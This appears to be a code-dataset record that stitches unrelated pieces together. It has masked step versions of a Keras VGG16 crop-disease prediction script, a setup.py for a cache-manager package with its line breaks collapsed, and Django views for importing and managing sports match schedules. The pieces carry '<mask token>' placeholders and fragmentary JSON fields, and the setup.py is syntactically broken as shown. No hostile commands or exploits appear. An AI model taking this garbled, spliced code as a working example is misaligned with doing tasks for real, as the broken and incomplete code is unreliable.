"step-2": "<mask token>\nnp.random.seed(1)\n<mask token>\nK.set_image_dim_ordering('th')\n<mask token>\nmodel.add(ZeroPadding2D((1, 1), input_shape=(3, img_width, img_height)))\nmodel.add(Convolution2D(64, 3, 3, activation='relu', name='conv1_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(64, 3, 3, activation='relu', name='conv1_2'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(128, 3, 3, activation='relu', name='conv2_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(128, 3, 3, activation='relu', name='conv2_2'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(256, 3, 3, activation='relu', name='conv3_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(256, 3, 3, activation='relu', name='conv3_2'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(256, 3, 3, activation='relu', name='conv3_3'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv4_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv4_2'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv4_3'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv5_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv5_2'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv5_3'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\nassert os.path.exists(weights_path\n ), \"Model weights not found (see 'weights_path' variable in script).\"\n<mask token>\nfor k in range(f.attrs['nb_layers']):\n if k >= len(model.layers):\n break\n g = f['layer_{}'.format(k)]\n 
weights = [g['param_{}'.format(p)] for p in range(g.attrs['nb_params'])]\n model.layers[k].set_weights(weights)\nf.close()\nprint('Model loaded.\\n')\n<mask token>\ntop_model.add(Flatten(input_shape=model.output_shape[1:]))\ntop_model.add(Dense(256, activation='relu'))\ntop_model.add(Dropout(0.5))\ntop_model.add(Dense(nb_classes, activation='softmax'))\ntop_model.load_weights(top_model_weights_path)\nmodel.add(top_model)\nprint('Final Model Assembled.\\n')\n<mask token>\nimg.load()\n<mask token>\nprint(data.shape)\n<mask token>\nprint('Prediction begins.\\n')\n<mask token>\nprint(output)\n",
"step-3": "<mask token>\nos.environ['THEANO_FLAGS'] = 'device=gpu1, floatX=float32'\n<mask token>\nnp.random.seed(1)\n<mask token>\nK.set_image_dim_ordering('th')\nweights_path = 'E:\\\\Interesting\\\\Code Fun Do 2017\\\\vgg16_weights.h5'\ntop_model_weights_path = (\n 'E:\\\\Interesting\\\\Code Fun Do 2017\\\\bottleneck_fc_model.h5')\nvalidation_data_dir = (\n 'E:\\\\Interesting\\\\Code Fun Do 2017\\\\Trial\\\\cercospora_leaf_spot_365.jpg')\nimg_width = 200\nimg_height = 200\ninput_shape = 3, img_height, img_width\nbatch_size = 32\nnb_classes = 4\nnb_epoch = 3\nnb_train_samples = 50\nnb_validation_samples = 25\nmodel = Sequential()\nmodel.add(ZeroPadding2D((1, 1), input_shape=(3, img_width, img_height)))\nmodel.add(Convolution2D(64, 3, 3, activation='relu', name='conv1_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(64, 3, 3, activation='relu', name='conv1_2'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(128, 3, 3, activation='relu', name='conv2_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(128, 3, 3, activation='relu', name='conv2_2'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(256, 3, 3, activation='relu', name='conv3_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(256, 3, 3, activation='relu', name='conv3_2'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(256, 3, 3, activation='relu', name='conv3_3'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv4_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv4_2'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv4_3'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 
3, 3, activation='relu', name='conv5_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv5_2'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv5_3'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\nassert os.path.exists(weights_path\n ), \"Model weights not found (see 'weights_path' variable in script).\"\nf = h5py.File(weights_path)\nfor k in range(f.attrs['nb_layers']):\n if k >= len(model.layers):\n break\n g = f['layer_{}'.format(k)]\n weights = [g['param_{}'.format(p)] for p in range(g.attrs['nb_params'])]\n model.layers[k].set_weights(weights)\nf.close()\nprint('Model loaded.\\n')\ntop_model = Sequential()\ntop_model.add(Flatten(input_shape=model.output_shape[1:]))\ntop_model.add(Dense(256, activation='relu'))\ntop_model.add(Dropout(0.5))\ntop_model.add(Dense(nb_classes, activation='softmax'))\ntop_model.load_weights(top_model_weights_path)\nmodel.add(top_model)\nprint('Final Model Assembled.\\n')\nimg = Image.open(validation_data_dir)\nimg.load()\ndata = np.asarray(img, dtype='int32')\nprint(data.shape)\ndata = data.reshape(1, 3, 200, 200)\nprint('Prediction begins.\\n')\noutput = model.predict_classes(data, batch_size=32, verbose=1)\nprint(output)\n",
"step-4": "<mask token>\nimport os\nos.environ['THEANO_FLAGS'] = 'device=gpu1, floatX=float32'\nimport theano\nimport numpy as np\nnp.random.seed(1)\nimport pandas as pd\nimport h5py\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import Sequential\nfrom keras.layers import Convolution2D, MaxPooling2D, ZeroPadding2D\nfrom keras.layers import Activation, Dropout, Flatten, Dense\nfrom keras import backend as K\nfrom PIL import Image\nK.set_image_dim_ordering('th')\nweights_path = 'E:\\\\Interesting\\\\Code Fun Do 2017\\\\vgg16_weights.h5'\ntop_model_weights_path = (\n 'E:\\\\Interesting\\\\Code Fun Do 2017\\\\bottleneck_fc_model.h5')\nvalidation_data_dir = (\n 'E:\\\\Interesting\\\\Code Fun Do 2017\\\\Trial\\\\cercospora_leaf_spot_365.jpg')\nimg_width = 200\nimg_height = 200\ninput_shape = 3, img_height, img_width\nbatch_size = 32\nnb_classes = 4\nnb_epoch = 3\nnb_train_samples = 50\nnb_validation_samples = 25\nmodel = Sequential()\nmodel.add(ZeroPadding2D((1, 1), input_shape=(3, img_width, img_height)))\nmodel.add(Convolution2D(64, 3, 3, activation='relu', name='conv1_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(64, 3, 3, activation='relu', name='conv1_2'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(128, 3, 3, activation='relu', name='conv2_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(128, 3, 3, activation='relu', name='conv2_2'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(256, 3, 3, activation='relu', name='conv3_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(256, 3, 3, activation='relu', name='conv3_2'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(256, 3, 3, activation='relu', name='conv3_3'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', 
name='conv4_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv4_2'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv4_3'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv5_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv5_2'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv5_3'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\nassert os.path.exists(weights_path\n ), \"Model weights not found (see 'weights_path' variable in script).\"\nf = h5py.File(weights_path)\nfor k in range(f.attrs['nb_layers']):\n if k >= len(model.layers):\n break\n g = f['layer_{}'.format(k)]\n weights = [g['param_{}'.format(p)] for p in range(g.attrs['nb_params'])]\n model.layers[k].set_weights(weights)\nf.close()\nprint('Model loaded.\\n')\ntop_model = Sequential()\ntop_model.add(Flatten(input_shape=model.output_shape[1:]))\ntop_model.add(Dense(256, activation='relu'))\ntop_model.add(Dropout(0.5))\ntop_model.add(Dense(nb_classes, activation='softmax'))\ntop_model.load_weights(top_model_weights_path)\nmodel.add(top_model)\nprint('Final Model Assembled.\\n')\nimg = Image.open(validation_data_dir)\nimg.load()\ndata = np.asarray(img, dtype='int32')\nprint(data.shape)\ndata = data.reshape(1, 3, 200, 200)\nprint('Prediction begins.\\n')\noutput = model.predict_classes(data, batch_size=32, verbose=1)\nprint(output)\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Mar 5 02:39:55 2017\n\n@author: sparsh\n\"\"\"\n\n\"\"\"\nCrop Disease Classification Project for Code Fun Do 2017 - IIT Roorkee\n\"\"\"\n\n\"\"\"\nFile for predicting a test image.\n\"\"\"\n\nimport os\nos.environ['THEANO_FLAGS'] = \"device=gpu1, floatX=float32\"\nimport theano\nimport numpy as np\nnp.random.seed(1)\n\nimport pandas as pd\nimport h5py\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import Sequential\nfrom keras.layers import Convolution2D, MaxPooling2D, ZeroPadding2D\nfrom keras.layers import Activation, Dropout, Flatten, Dense\nfrom keras import backend as K\nfrom PIL import Image\nK.set_image_dim_ordering('th')\n\n#Path to model weights file\nweights_path = \"E:\\\\Interesting\\\\Code Fun Do 2017\\\\vgg16_weights.h5\"\ntop_model_weights_path = \"E:\\\\Interesting\\\\Code Fun Do 2017\\\\bottleneck_fc_model.h5\"\n\n#Unknown Image Location\nvalidation_data_dir = \"E:\\\\Interesting\\\\Code Fun Do 2017\\\\Trial\\\\cercospora_leaf_spot_365.jpg\"\n#validation_data_dir = \"E:\\\\Interesting\\\\Code Fun Do 2017\\\\Trial\"\n\n#input image dimensions\nimg_width = 200\nimg_height = 200\ninput_shape = (3, img_height, img_width)\n\n#Model parameters\nbatch_size = 32\nnb_classes = 4\nnb_epoch = 3\nnb_train_samples = 50\nnb_validation_samples = 25\n\n# build the VGG16 network\nmodel = Sequential()\nmodel.add(ZeroPadding2D((1, 1), input_shape=(3, img_width, img_height)))\n\nmodel.add(Convolution2D(64, 3, 3, activation='relu', name='conv1_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(64, 3, 3, activation='relu', name='conv1_2'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\n\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(128, 3, 3, activation='relu', name='conv2_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(128, 3, 3, activation='relu', name='conv2_2'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 
2)))\n\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(256, 3, 3, activation='relu', name='conv3_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(256, 3, 3, activation='relu', name='conv3_2'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(256, 3, 3, activation='relu', name='conv3_3'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\n\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv4_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv4_2'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv4_3'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\n\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv5_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv5_2'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv5_3'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\n\n# load the weights of the VGG16 networks\n# (trained on ImageNet, won the ILSVRC competition in 2014)\n# note: when there is a complete match between your model definition\n# and your weight savefile, you can simply call model.load_weights(filename)\nassert os.path.exists(weights_path), \"Model weights not found (see 'weights_path' variable in script).\"\nf = h5py.File(weights_path)\nfor k in range(f.attrs['nb_layers']):\n if k >= len(model.layers):\n # we don't look at the last (fully-connected) layers in the savefile\n break\n g = f['layer_{}'.format(k)]\n weights = [g['param_{}'.format(p)] for p in range(g.attrs['nb_params'])]\n model.layers[k].set_weights(weights)\nf.close()\nprint(\"Model loaded.\\n\")\n\n# build a classifier model to put on top of the convolutional model\ntop_model = 
Sequential()\ntop_model.add(Flatten(input_shape=model.output_shape[1:]))\ntop_model.add(Dense(256, activation='relu'))\ntop_model.add(Dropout(0.5))\ntop_model.add(Dense(nb_classes, activation='softmax'))\n\n# note that it is necessary to start with a fully-trained\n# classifier, including the top classifier,\n# in order to successfully do fine-tuning\ntop_model.load_weights(top_model_weights_path)\n\n# add the model on top of the convolutional base\nmodel.add(top_model)\n#print(\"DC.\\n\")\nprint(\"Final Model Assembled.\\n\")\n\n#datagen = ImageDataGenerator(rescale=1./255)\n#generator = datagen.flow_from_directory(\n# validation_data_dir,\n# target_size=(img_width, img_height),\n# batch_size=32,\n# class_mode=None,\n# shuffle=False)\n#bottleneck_features_validation = model.predict_generator(generator, nb_validation_samples)\n#np.save(open('bottleneck_features_validation.npy', 'w'), bottleneck_features_validation)\n#print(\"Testing features stored.\\n\")\n\n#data = np.load(open('bottleneck_features_validation.npy'))\nimg = Image.open(validation_data_dir)\n\nimg.load()\n#print(\"chutiya.\\n\")\ndata = np.asarray(img, dtype=\"int32\")\n#print(\"harami.\\n\")\nprint(data.shape)\ndata = data.reshape(1, 3, 200, 200)\nprint(\"Prediction begins.\\n\")\noutput = model.predict_classes(data, batch_size=32, verbose=1)\nprint(output)",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import osfrom setuptools import setup
def read(fname): with open(fname) as fhandle: return fhandle.read()
def readMD(fname): # Utility function to read the README file. full_fname = os.path.join(os.path.dirname(__file__), fname) if 'PANDOC_PATH' in os.environ: import pandoc pandoc.core.PANDOC_PATH = os.environ['PANDOC_PATH'] doc = pandoc.Document() with open(full_fname) as fhandle: doc.markdown = fhandle.read() return doc.rst else: return read(fname)
version = '2.0.5'required = [req.strip() for req in read('requirements.txt').splitlines() if req.strip()]setup( name='CacheMan', version=version, author='Matthew Seal', author_email='mseal@opengov.com', description='A dependent cache manager', long_description=readMD('README.md'), install_requires=required, license='New BSD', packages=['cacheman'], test_suite='tests', zip_safe=False, url='https://github.com/OpenGov/py_cache_manager', download_url='https://github.com/OpenGov/py_cache_manager/tarball/v' + version, keywords=['tables', 'data', 'analysis', 'extraction'], classifiers=[ 'Development Status :: 4 - Beta', 'Topic :: Utilities', 'License :: OSI Approved :: BSD License', 'Natural Language :: English', 'Programming Language :: Python :: 2 :: Only' ])
|
normal
|
{
"blob_id": "7b18c967cf50d87b089dc22f3fbe6d40d708483f",
"index": 8441,
"step-1": "import osfrom setuptools import setup\ndef read(fname): with open(fname) as fhandle: return fhandle.read()\ndef readMD(fname): # Utility function to read the README file. full_fname = os.path.join(os.path.dirname(__file__), fname) if 'PANDOC_PATH' in os.environ: import pandoc pandoc.core.PANDOC_PATH = os.environ['PANDOC_PATH'] doc = pandoc.Document() with open(full_fname) as fhandle: doc.markdown = fhandle.read() return doc.rst else: return read(fname)\nversion = '2.0.5'required = [req.strip() for req in read('requirements.txt').splitlines() if req.strip()]setup( name='CacheMan', version=version, author='Matthew Seal', author_email='mseal@opengov.com', description='A dependent cache manager', long_description=readMD('README.md'), install_requires=required, license='New BSD', packages=['cacheman'], test_suite='tests', zip_safe=False, url='https://github.com/OpenGov/py_cache_manager', download_url='https://github.com/OpenGov/py_cache_manager/tarball/v' + version, keywords=['tables', 'data', 'analysis', 'extraction'], classifiers=[ 'Development Status :: 4 - Beta', 'Topic :: Utilities', 'License :: OSI Approved :: BSD License', 'Natural Language :: English', 'Programming Language :: Python :: 2 :: Only' ])",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from unidecode import unidecode
import pdb
import os, manage
import re
from datetime import *
import codecs
import csv
import smtplib
from django.core.urlresolvers import reverse
from django.shortcuts import redirect
from django.contrib.auth.models import User
from django.db.models import Q
from django.contrib import messages
from django.http import Http404
from django.contrib.auth.models import User
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render_to_response, render
from django.contrib.auth.models import User
from django.template import RequestContext
from django.utils import simplejson
from django.core.mail import send_mail
from django.contrib.auth.decorators import login_required
from django.contrib.admin.views.decorators import staff_member_required
from django.contrib import messages
from pytz import timezone
import pytz
from mailsnake import *
from .feeds import EventFeed
import mijnhercules.settings as settings
from .models import Match, Location
from .forms import MatchPresence
from members.models import Team, Player, MembershipHercules, Pass
# from mijnhercules.forms import *
from members.forms import EditPlayerForm, ArrangeSubstitutesForm, importMatchesForm, importPlayersForm
SITE_ROOT = os.path.dirname(os.path.realpath(manage.__file__))
eu = pytz.utc
#count amount of teams
# @login_required
# def TeamCount():
# t = Team.objects.all()
# return len(t)
def createMatchFeed(request, teamwedstrijd = None):
    """Render the iCal event feed with the matches for the given team."""
    feed = EventFeed(teamwedstrijd)
    return feed(request)
@login_required
def viewMatch(request, match):
    """Show a single match and, per Hercules team playing in it, the number
    of substitutes that team requested.

    Raises Http404 when no match with the given id exists.
    """
    try:
        m = Match.objects.get(id=match)
    except Match.DoesNotExist:
        raise Http404
    teams = m.getHercules()
    substituteoptions = False
    substitutes = {}
    for t in teams:
        # Fetch once instead of twice per team; 0 means the team requested
        # no substitutes for this match.
        team_subs = m.getSubstitutes(t.pk)
        if team_subs != 0:
            substituteoptions = True
            substitutes[t] = team_subs
    return render(request, 'viewmatch.html', {'match': m, 'hercules': teams,
                  'substitutes': substitutes, 'substituteoptions': substituteoptions})
@login_required  # request.user must be authenticated; an AnonymousUser would make the User lookup below 500
def editMatch(request, match):
    """Let a logged-in player set how many substitutes their team needs for a match.

    GET renders the form plus the substitute-willing players matching the
    player's gender; POST saves the requested amount. An invalid POST
    re-renders the bound form instead of silently returning ``None``.

    Raises Http404 when the match does not exist or the player's team is
    not playing in it.
    """
    u1 = User.objects.get(username=request.user.username)
    player = u1.get_profile()
    teampk = player.team_member.pk
    try:
        m = Match.objects.get(id=match)
    except Match.DoesNotExist:
        raise Http404
    if not m.isTeam(teampk):
        # Same outcome as before: players of non-participating teams get 404.
        raise Http404
    if request.method == 'POST':
        form = ArrangeSubstitutesForm(request.POST)
        if form.is_valid():
            cd = form.cleaned_data
            m.setSubstitutes(team=teampk, amountsubsneeded=cd['substitutesneeded'])
            m.save()
            return render(request, 'player/editplayer_complete.html')
        # Invalid form falls through and is re-rendered with its errors.
    else:
        form = ArrangeSubstitutesForm(initial={'substitutesneeded': m.getSubstitutesNeeded(teampk)})
    # NOTE(review): assumes gender is always 'V' or 'M'; any other value
    # leaves substituteWilling unbound (NameError), as in the original.
    if player.gender == 'V':
        substituteWilling = Player.women.filter(substitutewilling=True)
    elif player.gender == 'M':
        substituteWilling = Player.men.filter(substitutewilling=True)
    presentplayers = m.getPresentPlayers(player.team_member.pk)
    return render(request, 'match.html', {'match': m, 'form': form,
                  'substitutes': substituteWilling, 'presentplayers': presentplayers})
def readMatch(f):
    """Import indoor ("Zaal") matches from an uploaded NeVoBo CSV export.

    The file *f* is a Django uploaded file (latin-1, ';'-separated).  For every
    indoor row the location, both teams and the match itself are created or
    updated; matches inside the export's date range that no longer appear in
    the file are deleted (they were cancelled upstream).

    Returns a ``(savedmatches, error)`` tuple: ``error`` is None on success or
    a user-facing Dutch message when the file does not look like a valid CSV.

    Bug fix: the old header check was a chain of ``and``-ed string literals
    which, because non-empty strings are truthy, only really verified the last
    column name — every required column is now checked.  Bare ``except:``
    clauses have been narrowed to the exceptions they were meant to catch.
    """
    BAD_FILE_MSG = "Foutje: het lijkt geen csv bestand te zijn."
    REQUIRED_HEADERS = (
        'Wedstrijdnummer', 'Wedstrijddatum (niet geformatteerd)',
        'Aanvangstijd', 'Aanduiding', 'Thuis team', 'Uit team',
        'Sport omschrijving', 'Veld', 'Accommodatie naam', 'Plaats',
    )

    def _parse_date(row):
        """UTC-localized datetime from a row; the export uses 2- or 4-digit years."""
        stamp = row['Wedstrijddatum (niet geformatteerd)'] + " " + row['Aanvangstijd']
        try:
            return eu.localize(datetime.strptime(stamp, '%d-%m-%y %H:%M'))
        except ValueError:
            return eu.localize(datetime.strptime(stamp, '%d-%m-%Y %H:%M'))

    def _open_reader():
        """Fresh DictReader over the (re-)opened upload."""
        return csv.DictReader(codecs.EncodedFile(f, "latin-1"),
                              delimiter=';', dialect=csv.excel_tab)

    # --- sanity-check the header row -------------------------------------
    f.open()
    reader = csv.reader(codecs.EncodedFile(f, "latin-1"),
                        delimiter=';', dialect=csv.excel_tab)
    try:
        header = reader.next()
    except (StopIteration, csv.Error):
        f.close()
        return [], BAD_FILE_MSG
    if not all(col in header for col in REQUIRED_HEADERS):
        f.close()
        return [], BAD_FILE_MSG
    f.close()

    # --- determine the export's date range so cancelled matches can be
    # --- deleted afterwards ----------------------------------------------
    f.open()
    try:
        dates = [_parse_date(row) for row in _open_reader()]
    except (KeyError, ValueError):
        f.close()
        return [], BAD_FILE_MSG
    f.close()
    if not dates:
        # Empty export: nothing to import, nothing to delete.
        return [], None
    existingmatches = (Match.objects
                       .filter(date__lte=max(dates))
                       .filter(date__gte=min(dates)))

    # --- create/update matches -------------------------------------------
    savedmatches = []
    f.open()
    for row in _open_reader():
        if "Zaal" not in row['Aanduiding']:
            continue  # only indoor matches are tracked

        # The 'Veld' column looks like "<hall name> veld <n>"; the hall is
        # the Location.  Create it on first sight.
        hall = re.match(r'(.*)\sveld', row['Veld']).group(1)
        try:
            loc = Location.objects.get(name=hall)
        except Location.DoesNotExist:
            loc = Location.objects.create(name=hall)
            loc.save()

        # Get-or-create both teams; unknown teams get placeholder level '99'.
        try:
            t1 = Team.objects.get(number=row['Thuis team'])
        except Team.DoesNotExist:
            t1 = Team.objects.create(number=row['Thuis team'], level='99')
            t1.save()
        try:
            t2 = Team.objects.get(number=row['Uit team'])
        except Team.DoesNotExist:
            t2 = Team.objects.create(number=row['Uit team'], level='99')
            t2.save()

        date = _parse_date(row)

        # Update an existing match (keyed by the federation's match number)
        # or create a fresh one.
        try:
            m = Match.objects.get(nrid=row['Wedstrijdnummer'])
        except Match.DoesNotExist:
            m = Match(nrid=row['Wedstrijdnummer'],
                      date=date,
                      teamhome=t1,
                      teamaway=t2,
                      location=loc)
        else:
            m.date = date
            m.teamhome = t1
            m.teamaway = t2
            m.location = loc
        m.save()
        savedmatches.append(m)

    # --- purge matches cancelled upstream --------------------------------
    for e in existingmatches:
        if e not in savedmatches:
            e.delete()
    f.close()

    return savedmatches, None
def importMatch(request):
    """Upload page for the match CSV; also lists all upcoming matches.

    A valid POST hands the file to readMatch() and shows the import result;
    otherwise the upload form is (re-)rendered.
    """
    upcoming = Match.objects.exclude(date__lte=date.today()).order_by('date')
    if request.method == 'POST':
        form = importMatchesForm(request.POST, request.FILES)
        if form.is_valid():
            savedmatches, fail = readMatch(request.FILES['matches'])
            return render(request, 'savematch_success.html',
                          {'savedmatches': savedmatches, 'fail': fail})
    else:
        form = importMatchesForm()
    return render(request, 'savematch.html',
                  {'form': form, 'matches': upcoming})
def viewMyMatches(request):
    """List the logged-in player's team matches with a presence form per match."""
    user = User.objects.get(username=request.user.username)
    teampk = user.get_profile().team_member.pk
    my_matches = Match.objects.get_my_matches(teampk)
    presentmatches = dict(
        (m, MatchPresence(initial=('Aanwezig' if m.playerPresent(teampk, user)
                                   else 'Afwezig')))
        for m in my_matches)
    return render(request, 'mymatches.html',
                  {'mymatches': my_matches, 'presentmatches': presentmatches})
def offerSubstitute(request, matchpk, teampk, substitutepk):
    """Register a player as a possible substitute for a team's match."""
    player = Player.objects.get(pk=substitutepk)
    match = Match.objects.get(pk=matchpk)
    match.addSubstitute(teampk=teampk, player=player)
    messages.add_message(request, messages.SUCCESS,
                         'Je hebt jezelf aangemeld als mogelijke invaller. Goed bezig!!')
    return redirect(reverse(viewMatch, args=(matchpk,)))
def cancelSubstituteOffer(request, matchpk, teampk, substitutepk):
    """Withdraw a player's substitute offer for a team's match."""
    player = Player.objects.get(pk=substitutepk)
    match = Match.objects.get(pk=matchpk)
    match.removeSubstitute(teampk=teampk, player=player)
    messages.add_message(request, messages.SUCCESS,
                         'Je afmelding als mogelijke invaller is doorgegeven.')
    return redirect(reverse(viewMatch, args=(matchpk,)))
def addMatchPresence(request, matchpk, teampk, playerpk):
    """Mark a player as present for a team's match, then return to the edit page."""
    player = Player.objects.get(pk=playerpk)
    match = Match.objects.get(pk=matchpk)
    match.addMatchPresence(teampk=teampk, player=player)
    messages.add_message(request, messages.SUCCESS,
                         'Je hebt jezelf aangemeld voor deze wedstrijd!!')
    return redirect(reverse(editMatch, args=(matchpk,)))
def removeMatchPresence(request, matchpk, teampk, playerpk):
    """Mark a player as absent for a team's match, then return to the edit page."""
    player = Player.objects.get(pk=playerpk)
    match = Match.objects.get(pk=matchpk)
    match.removeMatchPresence(teampk=teampk, player=player)
    messages.add_message(request, messages.SUCCESS,
                         'Je afmelding voor deze wedstrijd is doorgegeven.')
    return redirect(reverse(editMatch, args=(matchpk,)))
|
normal
|
{
"blob_id": "480787d7bc0e87df7c59c4deb402eea76643680c",
"index": 7529,
"step-1": "<mask token>\n\n\ndef createMatchFeed(request, teamwedstrijd=None):\n cal = EventFeed(teamwedstrijd)\n return cal.__call__(request)\n\n\n@login_required\ndef viewMatch(request, match):\n try:\n m = Match.objects.get(id=match)\n except Match.DoesNotExist:\n raise Http404\n teams = m.getHercules()\n substituteoptions = False\n substitutes = {}\n for t in teams:\n if m.getSubstitutes(t.pk) != 0:\n substituteoptions = True\n substitutes[t] = m.getSubstitutes(t.pk)\n return render(request, 'viewmatch.html', {'match': m, 'hercules': teams,\n 'substitutes': substitutes, 'substituteoptions': substituteoptions})\n\n\n<mask token>\n\n\ndef viewMyMatches(request):\n u1 = User.objects.get(username=request.user.username)\n teampk = u1.get_profile().team_member.pk\n matches = Match.objects.get_my_matches(teampk)\n presentmatches = {}\n for m in matches:\n if m.playerPresent(teampk, u1):\n status = 'Aanwezig'\n else:\n status = 'Afwezig'\n presentmatches[m] = MatchPresence(initial=status)\n return render(request, 'mymatches.html', {'mymatches': matches,\n 'presentmatches': presentmatches})\n\n\n<mask token>\n\n\ndef cancelSubstituteOffer(request, matchpk, teampk, substitutepk):\n match = Match.objects.get(pk=matchpk)\n match.removeSubstitute(teampk=teampk, player=Player.objects.get(pk=\n substitutepk))\n messages.add_message(request, messages.SUCCESS,\n 'Je afmelding als mogelijke invaller is doorgegeven.')\n return redirect(reverse(viewMatch, args=(matchpk,)))\n\n\ndef addMatchPresence(request, matchpk, teampk, playerpk):\n match = Match.objects.get(pk=matchpk)\n match.addMatchPresence(teampk=teampk, player=Player.objects.get(pk=\n playerpk))\n messages.add_message(request, messages.SUCCESS,\n 'Je hebt jezelf aangemeld voor deze wedstrijd!!')\n return redirect(reverse(editMatch, args=(matchpk,)))\n\n\ndef removeMatchPresence(request, matchpk, teampk, playerpk):\n match = Match.objects.get(pk=matchpk)\n match.removeMatchPresence(teampk=teampk, 
player=Player.objects.get(pk=\n playerpk))\n messages.add_message(request, messages.SUCCESS,\n 'Je afmelding voor deze wedstrijd is doorgegeven.')\n return redirect(reverse(editMatch, args=(matchpk,)))\n",
